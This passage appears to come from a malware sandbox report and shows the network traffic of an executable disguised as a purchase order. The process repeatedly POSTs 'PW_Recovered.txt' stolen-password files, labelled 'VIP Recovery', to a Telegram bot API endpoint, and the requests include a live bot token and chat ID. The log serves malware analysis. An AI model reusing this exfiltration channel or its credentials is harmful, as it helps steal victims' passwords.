                                                                                                                                            2024-12-16 13:16:00 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 35 39 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17223,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354959,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            33192.168.2.449914149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:16:01 UTC345OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd30609e76b5a6
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            2024-12-16 13:16:01 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 30 36 30 39 65 37 36 62 35 61 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd30609e76b5a6Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:16:02 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:16:01 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:16:02 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17225,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354961,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            34192.168.2.449920149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:16:03 UTC369OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd31135be8a6fd
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:16:03 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 31 33 35 62 65 38 61 36 66 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd31135be8a6fdContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:16:04 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:16:03 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:16:04 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 36 33 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17227,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354963,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            35192.168.2.449926149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:16:05 UTC345OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd31c275b6509a
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            2024-12-16 13:16:05 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 63 32 37 35 62 36 35 30 39 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd31c275b6509aContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:16:06 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:16:06 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:16:06 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 36 36 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17231,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354966,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            36192.168.2.449930149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:16:07 UTC369OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd32858bb2d8ad
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:16:07 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 38 35 38 62 62 32 64 38 61 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd32858bb2d8adContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:16:08 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:16:08 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:16:08 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 36 38 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17233,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354968,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            37192.168.2.449936149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:16:09 UTC345OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd334532b593f8
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            2024-12-16 13:16:09 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 33 34 35 33 32 62 35 39 33 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd334532b593f8Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:16:10 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:16:10 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:16:10 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17235,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354970,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            38192.168.2.449941149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:16:11 UTC369OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd33cd13cbab4b
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:16:11 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 33 63 64 31 33 63 62 61 62 34 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd33cd13cbab4bContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:16:12 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:16:12 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:16:12 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 37 32 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17237,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354972,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            39192.168.2.449947149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:16:13 UTC345OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3477b07939ab
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
